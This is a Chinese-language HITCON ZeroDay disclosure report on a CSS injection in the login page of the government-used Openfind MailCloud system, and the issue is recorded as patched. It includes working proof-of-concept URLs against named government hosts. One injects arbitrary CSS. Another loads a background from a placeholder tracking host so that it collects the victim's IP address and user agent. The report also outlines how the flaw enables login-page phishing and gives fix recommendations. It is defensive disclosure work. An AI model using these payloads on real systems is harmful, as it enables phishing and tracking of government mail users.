政府機關Openfind MailCloud系統 登入頁面 CSS Injection 漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2026-00583
  •  發信 Vendor: 台灣電腦網路危機處理暨協調中心(TWCERT/CC)
  • Title: 政府機關Openfind MailCloud系統 登入頁面 CSS Injection 漏洞
  • Introduction: CSS Injection攻擊者可注入任意 CSS 語法,進行視覺釣魚或外部資源載入攻擊。

處理狀態

目前狀態

公開
Last Update : 2026/07/07
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2026/04/26 01:37:18 : 新提交 (由 vic88 更新此狀態)
  • 2026/04/26 01:38:22 : 新提交 (由 vic88 更新此狀態)
  • 2026/04/26 01:50:55 : 新提交 (由 vic88 更新此狀態)
  • 2026/04/27 17:51:57 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/27 12:31:40 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/27 12:31:40 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/27 12:31:40 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/06/26 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2026/06/29 12:11:44 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/07 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2026-00583
  • 通報者:vic88 (vic88)
  • 風險:中
  • 類型:其他 (Other)

參考資料

暫無資料
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://es.gov.mailcloud.tw/cgi-bin/login
https://esn.gov.mailcloud.tw/cgi-bin/login

敘述

漏洞說明

登入頁面(/cgi-bin/login)接受 user_domain 的GET 參數,並將其值直接反射至 HTML 的 <style> 區塊中,未對 CSS 跳脫字元(如 ')})進行過濾或跳脫,導致攻擊者可注入任意 CSS 規則。

重現方法

1.確認問題

https://es.gov.mailcloud.tw/cgi-bin/login?user_domain=test123

觀看原始碼可發現

        <style>

html {

    background-image: url('/cgi-bin/login_portal/background?t=1653468030&user_domain=test123');

}

被注入到css部分。

圖片
可以看到內容變成紅色了

2.可注入任意css規則

https://es.gov.mailcloud.tw/cgi-bin/login?user_domain=x');%20}%20*%20{color:red%20!important;}%20html%20{x:url('y

進入網頁可發現字體顏色被變更。

3.外部資源載入

https://es.gov.mailcloud.tw/cgi-bin/login?user_domain=x')%20no-repeat;%20background:url('https://test.com/track

上述網址為範例,但經測試後可發現確實可行,受害者瀏覽器會主動向攻擊者伺服器發送 HTTP Request,攻擊者可蒐集受害者 IP、User-Agent 等資訊。
圖片
使用者點擊連結
圖片
網頁載入,即可追蹤到使用者資料

影響

可構造多種惡意css語法,可能導致多方面的風險,以下列舉部分。 攻擊手法 說明
視覺釣魚 隱藏原登入表單,偽造假登入 UI
外部資源載入 受害者 IP / User-Agent 洩漏
信任問題 官方網域下可顯示任意內容

攻擊者只需將惡意 URL 傳送給受害者,受害者點擊後即在官方網域下看到被竄改的登入頁面,且此為政府使用之郵件系統。

修補建議

1. **驗證user_domain**:user_domain 只允許合法 domain 格式

2. **CSS 跳脫**:若需反射至 CSS context, 對 `'`、`"`、`)`、`}`、`;` 等字元進行跳脫

3. **伺服器端驗證**:比對 user_domain 是否在已知清單中,拒絕任意構造值

4. **CSP Header**:加入 Content-Security-Policy,限制外部資源載入來源

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;